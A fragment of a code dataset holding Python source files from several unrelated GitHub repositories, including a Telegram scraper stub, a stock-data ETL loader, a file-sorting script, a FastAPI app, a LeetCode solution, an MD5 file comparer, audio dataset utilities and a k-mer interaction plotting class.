100.)\n","repo_name":"glycine-addict/FastSpeech","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16747544965","text":"import telebot\nimport dotenv\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\nimport os\n\ndef load_envs(path: str) -> None:\n dotenv_path = Path(path)\n dotenv.load_dotenv(dotenv_path=dotenv_path)\n\nTELEGRAM_TOKEN = os.getenv(\"TELEGRAM_TOKEN\") # NB: read at import time, before load_envs() runs, so this is None unless the shell already defines it\n\ndef parse_table(url):\n SNILS = os.getenv(\"SNILS\")\n snils_list = SNILS.split(',')\n html_text = requests.get(url)\n soup = BeautifulSoup(html_text.content, 'html5lib')\n table = soup.find(\"table\", class_=\"namesTable\")\n i = 0\n pos = {}\n for row in table.find_all(attrs={'class':'fio'})[1:]:\n i += 1\n if row.text in snils_list:\n pos.update({f\"{i}\":f\"{row.text}\"})\n return pos\n\n\ndef main():\n # bot = telebot.TeleBot(TELEGRAM_TOKEN)\n load_envs('../.env')\n 
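# Hypothetical ../.env layout this script expects (variable names from the code above, values invented):\n #   TELEGRAM_TOKEN=123456:ABC-DEF\n #   SNILS=first entry,second entry\n # With those set, parse_table() below returns {row_position: row_text} for every 'fio' cell whose text appears in SNILS.\n 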
parse_table('https://priem.mirea.ru/accepted-entrants-list/personal_code_rating.php?competition=1714961437918539062&prior=any&documentType=original&accepted=1&acceptedEntrant=any&onlyActive=1&onlyPaid=0')\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"nocturnalq/mirea_committee_bot","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25456853054","text":"import os, json\nfrom datetime import datetime\nfrom Common.dw_tables import dw_conn, fact_table\nimport sqlalchemy\nfrom sqlalchemy import text\n\n\ncurrent_file = __file__ # Gets the current file path\nparent_directory = os.path.abspath(os.path.join(current_file, os.pardir))\n\ndef load_historical_stock_data():\n stocks = dw_conn.execute(text(\"\"\"SELECT \"Ma_cp\" FROM thong_tin_co_phieu WHERE \"Nganh\" <> 'Chứng quyền'\"\"\")).fetchall()\n jfile = open(f'{parent_directory}/Extract/Stocks_Price/historical_stocks_data.json', encoding='utf-8')\n data_obj = json.load(jfile)\n times = dw_conn.execute(text('SELECT \"Thoi_gian\" FROM thoi_gian')).fetchall()\n\n for stock in stocks:\n for day in data_obj[stock[0]]:\n if day['date'] == \"Ngày\" or day['close_price'][0] == \"Đóng cửa\":\n continue\n else:\n time = datetime.strptime(day['date'], '%d/%m/%Y')\n if(time.date(),) not in times:\n continue\n time_str = time.strftime('%Y-%m-%d')\n query = sqlalchemy.insert(fact_table).values(\n Thoi_gian = time,\n scj_id = 'scj_' + time_str,\n nl_id = 'nl_' + time_str,\n ls_id = 'ls_' + time_str,\n Ma_cp = stock[0],\n Gia_dong_cua = float(day['close_price'][0].replace(',', '.')),\n Thay_doi_phan_tram = day['change%'] if day['change%'] == 0.0 else float(day['change%'].replace('%', '').replace(',', '.')),\n Thay_doi = day['change'] if day['change'] == 0.0 else float(day['change'].replace(',', '')),\n Gia_thap_nhat = float(day['lowest'].replace(',', '.')),\n Gia_cao_nhat = float(day['highest'].replace(',', '.')),\n Tong_KLGD = float(day['kl'].replace('.', '')) \n )\n\n dw_conn.execute(query)\n\n\nif __name__ == \"__main__\": \n load_historical_stock_data()\n","repo_name":"Tran-Quang-Phuc/Data_Pipeline","sub_path":"dags/ETL_Manager/load_historical_main_transactions.py","file_name":"load_historical_main_transactions.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21303062745","text":"##########################write the folder name inside the python file --> while scanning the files, each file's contents are read and the file is moved into the matching folder if that folder's name is written inside it\n#for example, if the file contains cartella=PROVA , it reads the file and moves it into the folder prova (if it exists)\n\n\n##MOVES THE FILE INTO A FOLDER IF THE FILE CONTAINS THAT FOLDER'S NAME \t\tTHE FILE MUST CONTAIN CARTELLA==foldername, e.g. if the folder is called fibonacci \t\t\tCARTELLA==fibonacci\nimport os\nimport shutil\npath=\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\\"\nos.startfile(path)\n# ~ os.rename(\"path/to/current/file.foo\", \"path/to/new/destination/for/file.foo\")\n# ~ os.replace(\"path/to/current/file.foo\", \"path/to/new/destination/for/file.foo\")\n\n# ~ direcory=[f for f in path.iterdir() if f.is_dir()]\n# ~ shutil.move(\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\tk_inter_input\\\\hellotxt\", \"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\tk_inter_input\\\\hello\\\\hellotxt\")\n# ~ os.walk(directory)\n#CARTELLA==fibonacci\n\n\n# ~ print(os.path.isdir(path1))\n# ~ print(os.listdir(path)) # returns list\n# ~ print\nlistafiles=[]\nlistafolders=[]\n\nfor x in os.listdir(path):#look inside this folder and, if it contains folders, report their names\n\tpath1=path+\"\\\\\"+str(x)\t#path for accessing files and folders\n\tif (os.path.isdir(path+\"\\\\\"+x))==True:\n\t\tlistafolders.append(x)\n\t\t\t# ~ print(x)\n\telse:\n\t\tlistafiles.append(x)\n# ~ print(listafolders)\t\n# ~ print(listafiles)# ~ print(x)\n#same thing\n#DO YOU WANT TO MOVE THIS FILE INTO A FOLDER=? the folder name is chosen only at the start\n#given a piece of a string, look for file names containing that string and move them into the folder with a similar name (because it also contains the string)\n# ~ while True:\n\t# ~ stringa1=input(\"str\t\t\")#enter the piece of name shared between files and folders\n# ~ print(listafiles)\t\n\t# ~ stringa2=\n\t# ~ stringa=stringa1.lower()\nnomefile_corrente=os.path.basename(__file__)\n# ~ print(\"nomequestofile_su_cui_sto_scrivendo\t\t\",nomefile_corrente)\nfor x in listafiles:\n\t\t# ~ print(\"nome file\t\",x)\n\t\t# ~ cartella_destinazione=input(\"nome cartella destinazione\t(press enter to skip)\"\t)\n\t\t# ~ minuscolo=x.lower()\n\t\n\t\t# ~ if cartella_destinazione!=\"\":\n\t\t\t# ~ vuoi_spostare=input(\" vuoi spostare questo file %s, nella cartella %s (enter yes or y if u want) press enter if u dont want?\"%(minuscolo,cartella_destinazione))\n\t\t\t# ~ if vuoi_spostare==\"yes\" or \"y\":\n\t\t\t# ~ print(dove)\n\t\t\n\t\tpathfile=\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\\"+str(x)\n\t\tif x!=nomefile_corrente:\n\t\t\t# ~ print(x)\n\t\t\t\t\t\n\t\t\t\t\t\t\t# ~ print(pathfile)\n\t\t\t\t\t\t\t# ~ print(pathdestinazione)\n\t\t\t\t\t\t\t# ~ if str(cartella) in str(x):\n#def ciao():\t\t\t\t\t\t# ~ print(str(x))\n\t\t\ttry:\t\t\t\n\t\t\t\t\twith open(pathfile) as f:\n\t\t\t\t\t\n\t\t\t\t\t\tlines = f.readlines()\t\t\t\n\t\t\t\t\t\t# ~ print(lines)\n\t\t\t\t\tcartella_destinazione=\"\"\t\n\t\t\t\t\tfor y in lines:\n\t\t\t\t\t\tif \"CARTELLA==alarm_clock\" in y:\n\t\t\t\t\t\t\tcartella_destinazione=\"alarm_clock\"\n\t\t\t\t\t\t\t# ~ cartella_destinazione=cartella_destinazione\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tpathdestinazione=\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\\"+str(cartella_destinazione)+\"\\\\\"+str(x)\n\t\t\t\t\t\t\tshutil.move(pathfile, pathdestinazione)\t\n\t\t\t\t\t\t\tprint(x)\n\t\t\texcept:\n\t\t\t\tcontinue\n\n\t\t\n\t\t\t\t#\n\t\t\t\t\t\t# ~ print(\"e una prova\")\n\t\t\t\t\t\t# ~ try:\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t# ~ except:\n\t\t\t\t\t# ~ print(\"error , this folder does not exist\")\n\t\t\t\t\t# ~ continue\n\t\t\t# ~ if stringa in minuscolo:\n\t\t\t\t# ~ print(\"Misha %s and %s around\"%('walked',x))\n\n\t\t\t\t# ~ print()\n\t\t\t\t# ~ if yes_or_no==\"yes\" or \"y\":\n\t\t\t\t# ~ print(x)\n\t\t\t\t# ~ for cartella1 in listafolders:\n\t\t\t\t\t# ~ cartella=cartella1.lower()\n\t\t\t\t\t# ~ if stringa in cartella:\n\t\t\t\t\t\t# ~ print(cartella)\n\t\t\t# ~ if \"matr\" in cartella:\n\t\t\t\t# ~ print(cartella)\n\t\t\t\t# ~ print(cartella)\n\t\t\t\t\n\t\t\t\t# ~ if \"matr\" in x:\n\t\t\t\t\t# ~ print(x)\n\t\t\t\t# ~ if cartella in x:\n\t\t\t\t\t# ~ print(x) \n\t\t\t\t\n\t\t\t\t\t# ~ print(x)\n\t\t\t\t\t\n\t\t\t\t\t# ~ if listafolders[0] in x:\n\t\t\t\t\t\t# ~ print(\"ciao\")\t\ndef ciao():\n\tdef sposta_nella_cartella_prova_se_e_una_prova():\n\t\t#to tell whether it is a test file, open the file and check whether fileprova is written inside it\n\t\twith open(\"C:\\\\Users\\\\Attilio\\\\Desktop\\\\file_python\\\\tk_inter_input\"+\"\\\\tkmusic.py\") as f:\n\t\t\tlines = f.readlines()\t\t\t\n\t\t\tprint(lines)\n\n\t\tfor x in lines:\n\t\t\tif \"fileprova\" in x:\n\t\t\t\tprint(\"it is a test file\")\n\t# ~ print(x)\n# ~ if \"fileprova\" in lines:\n\t# ~ print(\"ciaociao\")\n\t\n\t# ~ print(\"ce\")\n# ~ print(path1)\n# ~ pathfile=path1+\"\\\\\"+str(\"hello2.txt\")\n# ~ print(pathfile)\t\n# ~ pathdestinazione=path1+\"\\\\\"+str(listafolders[0])+\"\\\\\"+str(\"hello2.txt\")\n# ~ print(pathdestinazione)\n\t\t# ~ print(os.path.isdir(path1))\n\t\t# ~ print(os.listdir(path))\n# ~ import os\n# pathfile=path1+\"\\\\\"+str(x)\n# ~ print(pathfile)\t\n# ~ pathdestinazione=path1+\"\\\\\"+str(listafolders[0])+\"\\\\\"+str(x)~ import shutil\n\n# ~ os.rename(\"path/to/current/file.foo\", \"path/to/new/destination/for/file.foo\")\n# ~ os.replace(\"path/to/current/file.foo\", \"path/to/new/destination/for/file.foo\")\n","repo_name":"paolocassina2/file_python2","sub_path":"file_python/metti_ordine_cartelle/esegui_per_ordinare_cartella/sortdirctory5.py","file_name":"sortdirctory5.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"43648510589","text":"from dataclasses import dataclass\n\nfrom fastapi import FastAPI, APIRouter\nfrom fastapi.responses import JSONResponse\nfrom fastapi import Response, Depends\n\n# all routes\nfrom routers import playlist_action, search_music\n\n# from Model.schema import UserRegistration\n\n\n\n# server initialization with configs\napp = FastAPI(\n title=\"Synched\",\n description=\"An app to help DJs find compatible songs by\\n **BPM, GENRE, COUNTRY AND POPULARITY**\",\n version=\"0.0.1\",\n contact={\n \"name\": \"Shadrack Meoli\",\n \"email\": \"shadcodes@gmail.com\"\n },\n redoc_url=\"/redoc\"\n)\n\n\n# plugging the routes into the entry file\napp.include_router(playlist_action.router)\napp.include_router(search_music.router)","repo_name":"shadmeoli/Synched","sub_path":"server/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"14782847064","text":"'''\nhttps://leetcode.com/problems/patching-array/\n\nGiven a sorted positive integer array nums and an integer n, add/patch elements to the array such that any number in range [1, n] inclusive can be formed by the sum of some elements in the array. 
Return the minimum number of patches required.\n\nExample 1:\nnums = [1, 3], n = 6\nReturn 1.\n\nCombinations of nums are [1], [3], [1,3], which form possible sums of: 1, 3, 4.\nNow if we add/patch 2 to nums, the combinations are: [1], [2], [3], [1,3], [2,3], [1,2,3].\nPossible sums are 1, 2, 3, 4, 5, 6, which now covers the range [1, 6].\nSo we only need 1 patch.\n\nExample 2:\nnums = [1, 5, 10], n = 20\nReturn 2.\nThe two patches can be [2, 4].\n\nExample 3:\nnums = [1, 2, 2], n = 5\nReturn 0.\n'''\n\nclass Solution(object):\n def minPatches(self, nums, n):\n \"\"\"\n :type nums: List[int]\n :type n: int\n :rtype: int\n \"\"\"\n i = 0\n bound = 1 # we can cover [0, bound)\n ans = 0\n while bound <= n:\n if i < len(nums) and nums[i] <= bound:\n bound += nums[i]\n i += 1\n else:\n ans += 1\n bound *= 2\n return ans\n\n\nif __name__ == '__main__':\n f = Solution().minPatches\n assert f([], 8) == 4\n assert f([1, 3], 6) == 1\n assert f([1, 5, 10], 20) == 2\n assert f([1, 2, 2], 5) == 0\n assert f([1, 2, 31, 33], 2147483647) == 28\n","repo_name":"irachex/leetcode","sub_path":"patching-array.py","file_name":"patching-array.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"10643601408","text":"\r\nimport hashlib\r\nimport eel\r\n\r\neel.init('Index')\r\nx = ''\r\ny = ''\r\n\r\n@eel.expose\r\ndef browsefunc(path):\r\n global x\r\n hash_md5 = hashlib.md5()\r\n with open(path, \"rb\") as f:\r\n for chunk in iter(lambda: f.read(4096), b\"\"):\r\n hash_md5.update(chunk)\r\n code1 = hash_md5.digest()\r\n x = code1\r\n \r\n@eel.expose\r\ndef browsefunc1(path2):\r\n global y\r\n hash_md5 = hashlib.md5()\r\n with open(path2, \"rb\") as f:\r\n for chunk in iter(lambda: f.read(4096), b\"\"):\r\n hash_md5.update(chunk)\r\n code1 = hash_md5.digest()\r\n y = code1\r\n \r\n@eel.expose \r\ndef gofunc():\r\n global x,y\r\n if x == y:\r\n return \"Both are same\"\r\n else:\r\n return \"They are different\"\r\n \r\n \r\neel.start('index.html') ","repo_name":"rudra98/GUI","sub_path":"py with js/testGUI.py","file_name":"testGUI.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36442075998","text":"import os\nimport subprocess\nfrom warnings import warn\nimport urllib\nimport tarfile\n\nfrom tqdm import tqdm\nimport numpy as np\nimport audiofile as af\nfrom torch.utils.data import Subset\n\nfrom ..utils import run_worker_threads\n\n\n__doctest_skip__ = ['load']\n\n\ndef load(\n filename,\n *,\n duration=None,\n offset=0,\n):\n r\"\"\"Load audio file.\n\n If an error occurs during loading because the file could not be found,\n is empty, or has the wrong format, an empty signal is returned and a\n warning is shown.\n\n Args:\n filename (str or int or file-like object): file name of input audio file\n duration (float, optional): return only a specified duration in\n seconds. 
Default: `None`\n offset (float, optional): start reading at offset in seconds.\n Default: `0`\n\n Returns:\n tuple:\n\n * **numpy.ndarray**: two-dimensional array with shape\n `(channels, samples)`\n * **int**: sample rate of the audio file\n\n Example:\n >>> signal, sampling_rate = load('speech.wav')\n\n \"\"\"\n signal = np.array([[]]) # empty signal of shape (1, 0)\n sampling_rate = None\n try:\n signal, sampling_rate = af.read(filename,\n duration=duration,\n offset=offset,\n always_2d=True)\n except ValueError:\n warn(f'File opening error for: {filename}', UserWarning)\n except (IOError, FileNotFoundError):\n warn(f'File does not exist: {filename}', UserWarning)\n except RuntimeError:\n warn(f'Runtime error for file: {filename}', UserWarning)\n except subprocess.CalledProcessError:\n warn(f'ffmpeg conversion failed for: {filename}', UserWarning)\n return signal, sampling_rate\n\n\ndef download_url(\n url,\n root,\n *,\n filename=None,\n md5=None,\n):\n r\"\"\"Download a file from an url to a specified directory.\n\n Args:\n url (str): URL to download file from\n root (str): directory to place downloaded file in\n filename (str, optional): name to save the file under.\n If `None`, use basename of URL. Default: `None`\n md5 (str, optional): MD5 checksum of the download.\n If None, do not check. Default: `None`\n\n Returns:\n str: path to downloaded file\n\n \"\"\"\n root = safe_path(root)\n if not filename:\n filename = os.path.basename(url)\n filename = os.path.join(root, filename)\n\n os.makedirs(root, exist_ok=True)\n\n # downloads file\n if not os.path.isfile(filename):\n bar_updater = _gen_bar_updater(tqdm(unit='B', unit_scale=True))\n try:\n print('Downloading ' + url + ' to ' + filename)\n urllib.request.urlretrieve(url, filename, reporthook=bar_updater)\n except OSError:\n if url[:5] == 'https':\n url = url.replace('https:', 'http:')\n print('Failed download. Trying https -> http instead.'\n ' Downloading ' + url + ' to ' + filename)\n urllib.request.urlretrieve(url, filename,\n reporthook=bar_updater)\n return safe_path(filename)\n\n\ndef download_url_list(\n urls,\n root,\n *,\n num_workers=0,\n):\n r\"\"\"Download files from a list of URLs to a specified directory.\n\n Args:\n urls (list of str or dict): either list of URLs or dictionary\n with URLs as keys and with either filenames or tuples of\n filename and MD5 checksum as values. Uses basename of URL if\n filename is `None`. Performs no check if MD5 checksum is `None`\n root (str): directory to place downloaded files in\n num_workers (int, optional): number of worker threads\n (0 = len(urls)). Default: `0`\n\n \"\"\"\n # always convert to dict\n if type(urls) is list:\n urls = {x: None for x in urls}\n\n # download file and extract\n def _task(url, filename):\n md5 = None\n if type(filename) is tuple:\n filename, md5 = filename\n return download_url(url, root, filename=filename, md5=md5)\n\n # start workers\n params = [(url, filename) for url, filename in urls.items()]\n return run_worker_threads(num_workers, _task, params)\n\n\ndef extract_archive(\n filename,\n *,\n out_path=None,\n remove_finished=False,\n):\n r\"\"\"Extract archive.\n\n Currently `tar.gz` and `tar` archives are supported.\n\n Args:\n filename (str): path to archive\n out_path (str, optional): extract archive in this folder.\n Default: folder where archive is located in\n remove_finished (bool, optional): if `True` remove archive after\n extraction. 
Default: `False`\n\n \"\"\"\n print(f'Extracting {filename}')\n if out_path is None:\n out_path = os.path.dirname(filename)\n if filename.endswith('tar.gz'):\n tar = tarfile.open(filename, 'r:gz')\n elif filename.endswith('tar'):\n tar = tarfile.open(filename, 'r:')\n else:\n raise RuntimeError('Archive format not supported.')\n tar.extractall(path=out_path)\n tar.close()\n if remove_finished:\n os.unlink(filename)\n\n\ndef sampling_rate_after_transform(\n dataset,\n):\n r\"\"\"Sampling rate of data set after all transforms are applied.\n\n A change of sampling rate by a transform is only recognized, if that\n transform has the attribute :attr:`output_sampling_rate`.\n\n Args:\n dataset (torch.utils.data.Dataset): data set with `sampling_rate`\n attribute or property\n\n Returns:\n int: sampling rate in Hz after all transforms are applied\n\n Example:\n >>> from audtorch import datasets, transforms\n >>> t = transforms.Resample(input_sampling_rate=16000,\n ... output_sampling_rate=8000)\n >>> data = datasets.WhiteNoise(sampling_rate=16000, transform=t)\n >>> sampling_rate_after_transform(data)\n 8000\n\n \"\"\"\n sampling_rate = dataset.original_sampling_rate\n try:\n # List of composed transforms\n transforms = dataset.transform.transforms\n except AttributeError:\n # Single transform\n transforms = [dataset.transform]\n for transform in transforms:\n if hasattr(transform, 'output_sampling_rate'):\n sampling_rate = transform.output_sampling_rate\n return sampling_rate\n\n\ndef ensure_same_sampling_rate(\n datasets,\n):\n r\"\"\"Raise error if provided data sets differ in sampling rate.\n\n All data sets that are checked need to have a `sampling_rate` attribute or\n property.\n\n Args:\n datasets (list of torch.utils.data.Dataset): list of at least two audio\n data sets.\n\n \"\"\"\n for dataset in datasets:\n if not hasattr(dataset, 'sampling_rate'):\n raise RuntimeError(\n f\"{dataset} doesn't have a `sampling_rate` attribute.\"\n )\n for n in range(1, len(datasets)):\n if datasets[0].sampling_rate != datasets[n].sampling_rate:\n error_msg = 'Sampling rates do not match:\\n'\n for dataset in datasets:\n info = dataset.__repr__()\n error_msg += f'{dataset.sampling_rate}Hz from {info}'\n raise ValueError(error_msg)\n\n\ndef ensure_df_columns_contain(\n df,\n labels,\n):\n r\"\"\"Raise error if the given labels are not in the dataframe columns.\n\n Args:\n df (pandas.dataframe): data frame\n labels (list of str): labels to be expected in `df.columns`\n\n Example:\n >>> import pandas as pd\n >>> df = pd.DataFrame(data=[(1, 2)], columns=['a', 'b'])\n >>> ensure_df_columns_contain(df, ['a', 'c'])\n Traceback (most recent call last):\n RuntimeError: Dataframe contains only these columns: 'a, b'\n\n \"\"\"\n ensure_df_not_empty(df)\n if labels is not None and not set(labels) <= set(df.columns):\n raise RuntimeError(\n f\"Dataframe contains only these columns: '{', '.join(df.columns)}'\"\n )\n\n\ndef ensure_df_not_empty(\n df,\n labels=None,\n):\n r\"\"\"Raise error if dataframe is empty.\n\n Args:\n df (pandas.dataframe): data frame\n labels (list of str, optional): list of labels used to shrink data\n set. 
Default: `None`\n\n Example:\n >>> import pandas as pd\n >>> df = pd.DataFrame()\n >>> ensure_df_not_empty(df)\n Traceback (most recent call last):\n RuntimeError: No valid data points found in data set\n\n \"\"\"\n error_message = 'No valid data points found in data set'\n if labels is not None:\n error_message += f\" for the selected labels: {', '.join(labels)}\"\n if len(df) == 0:\n raise RuntimeError(error_message)\n\n\ndef files_and_labels_from_df(\n df,\n *,\n column_labels=None,\n column_filename='filename',\n):\n r\"\"\"Extract list of files and labels from dataframe columns.\n\n Args:\n df (pandas.DataFrame): data frame with filenames and labels\n column_labels (str or list of str, optional): name of data frame\n column(s) containing the desired labels. Default: `None`\n column_filename (str, optional): name of column holding the file\n names. Default: `filename`\n\n Returns:\n tuple:\n * list of str: list of files\n * list of str or list of dicts: list of labels\n\n Example:\n >>> import pandas as pd\n >>> df = pd.DataFrame(data=[('speech.wav', 'speech')],\n ... columns=['filename', 'label'])\n >>> files, labels = files_and_labels_from_df(df, column_labels='label')\n >>> os.path.relpath(files[0]), labels[0]\n ('speech.wav', 'speech')\n\n \"\"\"\n if df is None:\n return [], []\n\n ensure_df_columns_contain(df, [column_filename])\n df = df.copy()\n files = df.pop(column_filename).tolist()\n\n if column_labels is None:\n return files, [''] * len(files)\n\n if isinstance(column_labels, str):\n column_labels = [column_labels]\n ensure_df_columns_contain(df, column_labels)\n df = df[column_labels]\n # Drop empty entries\n df = df.dropna().reset_index(drop=True)\n ensure_df_not_empty(df, column_labels)\n if len(column_labels) == 1:\n # list of strings\n labels = df.values.T[0].tolist()\n else:\n # list of dicts\n labels = df.to_dict('records')\n return files, labels\n\n\ndef _gen_bar_updater(pbar):\n def bar_update(count, block_size, total_size):\n if pbar.total is None and total_size:\n pbar.total = total_size\n progress_bytes = count * block_size\n pbar.update(progress_bytes - pbar.n)\n\n return bar_update\n\n\ndef defined_split(\n dataset,\n split_func,\n):\n r\"\"\"Split data set into desired non-overlapping subsets.\n\n Args:\n dataset (torch.utils.data.Dataset): data set to be split\n split_func (func): function mapping from data set index to subset id,\n :math:`f(\\text{index}) = \\text{subset\\_id}`.\n The target domain of subset ids does not need to cover the\n complete range `[0, 1, ..., (num_subsets - 1)]`\n\n Returns:\n (list of Subsets): desired subsets according to :attr:`split_func`\n\n Example:\n >>> import torch\n >>> from torch.utils.data import TensorDataset\n >>> from audtorch.samplers import buckets_of_even_size\n >>> data = TensorDataset(torch.randn(100))\n >>> lengths = np.random.randint(0, 1000, (100,))\n >>> split_func = buckets_of_even_size(lengths, 5)\n >>> subsets = defined_split(data, split_func)\n >>> [len(subset) for subset in subsets]\n [20, 20, 20, 20, 20]\n\n \"\"\"\n subset_ids = [split_func(i) for i in range(len(dataset))]\n unique_subset_ids = sorted(set(subset_ids))\n num_subsets = len(unique_subset_ids)\n\n split_indices = [[] for _ in range(num_subsets)]\n\n for i, subset_id in enumerate(subset_ids):\n # handle non-coherent target domain\n subset_id = unique_subset_ids.index(subset_id)\n split_indices[subset_id] += [i]\n\n return [Subset(dataset, indices)\n for indices in split_indices]\n\n\ndef safe_path(\n path,\n):\n \"\"\"Ensure the path is 
absolute and doesn't include `..` or `~`.\n\n Args:\n path (str): absolute or relative path\n\n Returns:\n str: absolute path\n\n \"\"\"\n return os.path.abspath(os.path.expanduser(path))\n","repo_name":"audeering/audtorch","sub_path":"audtorch/datasets/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12541,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"15351313919","text":"__license__ = \"MIT\"\n__version__ = \"0.9.6\"\n__authors__ = [\"Marvin Jens\"]\n__email__ = \"mjens@mit.edu\"\n\nimport sys\nimport itertools\nimport numpy as np\nimport copy\nimport time\nimport os\nimport logging\nimport collections\nimport RBPamp.cyska\nimport matplotlib\n#matplotlib.use('pdf')\nimport matplotlib.pyplot as pp\n\nfrom RBPamp.caching import cached, pickled, CachedBase\nfrom RBPamp.rbns_reads import RBNSReads\nfrom RBPamp.rbns_analysis import RBNSAnalysis\nfrom RBPamp.ska_runner import SKARunner\n\n\nclass PairInteractionScreen(object):\n def __init__(self, res, core, k_int, pseudo=10.):\n self.res = res\n self.core = core\n self.k_int = k_int\n self.k_core = len(core)\n \n #print \"scanning flanking {0}-mers\".format(k_int)\n pd_matrix, pd_mask = self.res.pd_reads.kmer_flank_profiles(core, k_int)\n in_matrix, in_mask = self.res.in_reads.kmer_flank_profiles(core, k_int)\n\n self.core_density_pd = pd_mask.sum(axis=0)\n self.core_density_bg = in_mask.sum(axis=0)\n \n pd_matrix = np.array(pd_matrix, dtype=np.float32) + pseudo\n in_matrix = np.array(in_matrix, dtype=np.float32) + pseudo\n\n obsv = pd_matrix / pd_matrix.sum(axis=0)[np.newaxis,:]\n bgnd = in_matrix / in_matrix.sum(axis=0)[np.newaxis,:]\n\n # Kullback-Leibler (KL) divergence terms\n self._KL = (obsv * np.log2(obsv / bgnd) )\n # and per-position KL\n self.KL = self._KL.sum(axis=0)\n self.log_ratios = np.log2(obsv / bgnd)\n\n # mask positions overlapping with the core motif\n self.l = self.res.pd_reads.L - self.k_core\n self.KL[self.l-self.k_int+1:self.l+self.k_core] = 0\n self.log_ratios[:,self.l-self.k_int+1:self.l+self.k_core] = 0\n #print \"mask\",self.l-self.k_int+1,self.l+self.k_core \n #print \"log_ratios after masking\", self.log_ratios[:,self.l-self.k_int+1:self.l+self.k_core]\n\n def top_interactors(self, n_top=10):\n #TODO: cook a set of candidate interacting kmers from significance for now let's just take top 10\n top_i = self._KL.max(axis=1).argsort()[::-1][:n_top]\n # and sort alphabetically to ensure reproducibility across successive runs\n top_i = sorted(top_i)\n top_kmers = [cyska.index_to_seq(i, self.k_int) for i in top_i]\n #print \"top interacting kmer candidate list\", top_kmers\n return top_i, top_kmers\n \n def make_plot(self, fname, n_top=10):\n import matplotlib as mp\n mp.rcParams['font.family'] = 'Arial'\n mp.rcParams['font.size'] = 8\n mp.rcParams['font.sans-serif'] = 'Arial'\n mp.rcParams['legend.fontsize'] = 'small'\n mp.rcParams['legend.frameon'] = False\n #mp.rcParams['axes.labelsize'] = 8\n \n import matplotlib.pyplot as pp\n fig = pp.figure()\n fig.subplots_adjust(hspace=0.5)\n \n pp.title(\"{self.res.pd_reads.rbp_name}@{self.res.pd_reads.rbp_conc}nM {self.core} interacting with {self.k_int}-mers\".format(self=self))\n pp.subplot(311)\n pp.gca().set_title(\"density of {0} core\".format(self.core.upper()))\n pp.plot(self.core_density_pd, drawstyle='steps-mid', label=\"pd\")\n pp.plot(self.core_density_bg, drawstyle='steps-mid', label=\"in\")\n pp.gca().locator_params(axis='y',nbins=3)\n 
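# thin out the axis ticks (nbins caps the number of tick intervals) so the three stacked panels stay legible\n 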
pp.gca().locator_params(axis='x',nbins=10)\n\n pp.legend(loc='upper left')\n pp.xlabel(\"read start pos [nt]\")\n pp.ylabel(\"frequency\")\n \n pp.subplot(312)\n pp.title(\"Kullback-Leibler divergence of flanking kmer composition\")\n x = np.arange(len(self.KL)) - len(self.KL)/2 +1.\n pp.plot(x,self.KL, drawstyle='steps-mid', label=\"{0}mers around {1}\".format(self.k_int, self.k_core) )\n pp.xlim(-self.l-.5,self.l+.5)\n pp.xlabel(\"rel. {0}-mer start pos [nt]\".format(self.k_int))\n pp.ylabel(\"KL [bits]\")\n \n pp.subplot(313)\n pp.gca().set_title(\"enriched {0}-mers\".format(self.k_int))\n top_i, top_kmers = self.top_interactors(n_top = n_top)\n z = self.log_ratios[top_i[::-1],:]\n y, x = np.mgrid[slice(0, len(top_i)+1),slice(-(self.l+.5), +self.l+1)]\n \n # symmetric, dynamic range of colorbar\n dr = np.fabs(z).max()\n pp.pcolor(x,y,z, cmap=pp.get_cmap('seismic'), vmin=-dr, vmax=dr)\n\n pp.yticks(np.arange(len(top_i))+.5, top_kmers[::-1]) # reverse order of kmers so pcolor is not upside down\n pp.xlim(-self.l-.5,self.l+.5)\n cbar = pp.colorbar(orientation=\"horizontal\", fraction=0.1, shrink=0.75, label=r\"$\\log_2( \\frac{pd}{in} )$\")\n cbar.ax.tick_params(labelsize=8)\n pp.savefig(fname)\n pp.close()\n \n","repo_name":"RomoL2/RegVar","sub_path":"inst/extdata/RBPamp/RBPamp/kmer_interactions.py","file_name":"kmer_interactions.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
